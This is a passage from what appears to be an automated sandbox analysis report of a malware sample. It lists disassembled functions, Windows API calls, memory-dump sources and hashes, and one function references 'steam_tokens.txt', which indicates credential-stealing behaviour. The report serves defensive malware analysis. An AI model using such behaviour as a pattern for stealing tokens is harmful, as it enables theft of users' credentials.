                                  • lstrcat.KERNEL32(?,00411794), ref: 003FEA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: b38ed7c02696f33c7713a1ff7a2234c09d89ebce008f758ec6b5563c74a7291a
                                  • Instruction ID: 949d5b45e35b0c37088e720d2bfce1192674b976fd9af53d87f38b65374fdb47
                                  • Opcode Fuzzy Hash: b38ed7c02696f33c7713a1ff7a2234c09d89ebce008f758ec6b5563c74a7291a
                                  • Instruction Fuzzy Hash: 1441A971D1011CAFCB16EB64DC42FEE7379BF48300F045569BA1A9B2D1DE749E448B50
                                  Function 003FECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FECDF
                                  • lstrlen.KERNEL32(00000000), ref: 003FECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FED1D
                                  • lstrlen.KERNEL32(00000000), ref: 003FED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003FED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: a921b9f0e94f60744abadbef9132eecf762c45e3dd36a847515d438c97b6996d
                                  • Instruction ID: 4559f145a751fdbf2420a667f2e9f2325a01a4304cde9f7d20f0593919738157
                                  • Opcode Fuzzy Hash: a921b9f0e94f60744abadbef9132eecf762c45e3dd36a847515d438c97b6996d
                                  • Instruction Fuzzy Hash: 8C318D32A101A95FC723BB79E84AAAF7769AF40700F055230F905DF2A2DF74DD168791
                                  Function 003E9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,003E140E), ref: 003E9A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,003E140E), ref: 003E9AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,003E140E), ref: 003E9AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,003E140E,00000000,?,?,?,003E140E), ref: 003E9AE0
                                  • LocalFree.KERNEL32(?,?,?,?,003E140E), ref: 003E9B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,003E140E), ref: 003E9B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 89280e4b1bfe13f4db93435eed82d98f532cfa9bf351cee3d6691d3476b709ad
                                  • Instruction ID: 99b9e475002c077bd0ec0a39cf9e167a49539aa860c47d2e5b86835a4b590d81
                                  • Opcode Fuzzy Hash: 89280e4b1bfe13f4db93435eed82d98f532cfa9bf351cee3d6691d3476b709ad
                                  • Instruction Fuzzy Hash: FA115E7160021AEFE711DFAADCC8BAA736DEF04340F15426AF901A7280EB709D40CBA0
                                  Function 00405AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405B14
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00405B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00405B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00405B98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: 62bdcfbdddb8aedae7dd264e9fb216e42679148d7f1b892d483b177f4e4eabfa
                                  • Instruction ID: f632658816675b03ff2aa9ae6529f8706c40e0f679db4f0cd5e01e6337e63ed5
                                  • Opcode Fuzzy Hash: 62bdcfbdddb8aedae7dd264e9fb216e42679148d7f1b892d483b177f4e4eabfa
                                  • Instruction Fuzzy Hash: 41417271B005199FCF18DF6CC995AAEBBB5EB89310F15823AE919E7384D634ED008B94
                                  Function 004090DD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: 14ade87c2a522afc8d79fadadd9087f630a2d2c8503a51f91a9ecf6212c9ee27
                                  • Instruction ID: 84a129b66d317aff696c75b9897652a4e50e9b796dfe5d6081c8657069597834
                                  • Opcode Fuzzy Hash: 14ade87c2a522afc8d79fadadd9087f630a2d2c8503a51f91a9ecf6212c9ee27
                                  • Instruction Fuzzy Hash: 274116B050474CAEEB218B248D84FFB7BF89B45308F1448FDE986A61C3D2759E458F28
                                  Function 003F7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7D58
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1D5
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003F7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: cac4a14b93f354f0de60fa1e77d0a6bf821151fa4d1dd042a02da263b9414543
                                  • Instruction ID: 369258ed50fb435268ee4dd597ba83f5465929e8a11b604fa24a9d54db278df5
                                  • Opcode Fuzzy Hash: cac4a14b93f354f0de60fa1e77d0a6bf821151fa4d1dd042a02da263b9414543
                                  • Instruction Fuzzy Hash: A421E4323183088BD722DE2CD880A3AF7E5AFA1750B614A2EF5528B381D770DC4083A5
                                  Function 004033C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004033EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 004033F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00403411
                                  • wsprintfA.USER32 ref: 00403437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: e439d1b8655f5958304dd75368c4c47b0fd38efec968a066debef1628125aabd
                                  • Instruction ID: ede02886ac42383acbc778a725dc27389083b0ff1c4213f6b9d88221c15ffea4
                                  • Opcode Fuzzy Hash: e439d1b8655f5958304dd75368c4c47b0fd38efec968a066debef1628125aabd
                                  • Instruction Fuzzy Hash: B401D8B1E04214AFDB04DFA8DC45BAEBBBDFB44711F54412AF906E73C0D778590086A9
                                  Function 00402400 Relevance: 7.7, APIs: 6, Instructions: 234stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlenmemset
                                  • String ID:
                                  • API String ID: 3212139465-0
                                  • Opcode ID: 5bb3803fbc36b76d5aa0bdf78c589e6ba2a996175721ee432596236d89cafbc7
                                  • Instruction ID: 150e193dc91747fb5119aac42e8f6c94bb881f2a3325ce9d639a183725792515
                                  • Opcode Fuzzy Hash: 5bb3803fbc36b76d5aa0bdf78c589e6ba2a996175721ee432596236d89cafbc7
                                  • Instruction Fuzzy Hash: F481E570E00205ABDB14DB95DD48BAEB7B5AF84304F18817AE508B73C1EBB99D45CB98
                                  Function 003F7EE0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F7F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F7F60
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F7FA5
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F7FD3
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F8007
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 66c0647950175526dd4608730b6973ed2dd9fa1ffd53034208c052e77f32f736
                                  • Instruction ID: 3848af3306c8f7b3a4a97890aef805a014e8316241153f1692581d358c46f6de
                                  • Opcode Fuzzy Hash: 66c0647950175526dd4608730b6973ed2dd9fa1ffd53034208c052e77f32f736
                                  • Instruction Fuzzy Hash: AE41923090421ADFCB22DF68D880EAE77B8FF54300F124199E905DB351EB70AA65CB91
                                  Function 003F8050 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F80BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F80EA
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F8102
                                  • lstrlen.KERNEL32(00000000), ref: 003F8140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F816F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: c5ee728d8c39ab3a05440f4d1477117fe0b0ccf53e2aa719ce8cfe901fbeee4b
